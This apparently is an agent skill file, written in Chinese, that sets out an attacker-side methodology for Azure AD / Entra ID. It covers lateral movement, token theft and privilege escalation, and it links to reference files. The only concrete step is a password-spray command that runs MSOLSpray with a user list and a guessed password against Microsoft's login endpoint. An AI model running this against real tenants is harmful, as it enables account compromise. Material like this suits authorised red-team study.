azure-ad-attack
Installation
SKILL.md
Azure AD / Entra ID 攻击方法论
定位:从攻击者视角利用 Azure AD 的信任关系、令牌机制和配置缺陷实现横向移动和权限提升
⛔ 深入参考
- Token 窃取与刷新攻击详细流程 → references/token-attacks.md
- Service Principal 与应用注册滥用 → references/app-abuse.md
Phase 1: 初始访问
1.1 Password Spray(Azure AD)
# MSOLSpray — Azure AD 密码喷洒
python3 MSOLSpray.py --userlist users.txt --password 'Spring2024!' \
--url https://login.microsoftonline.com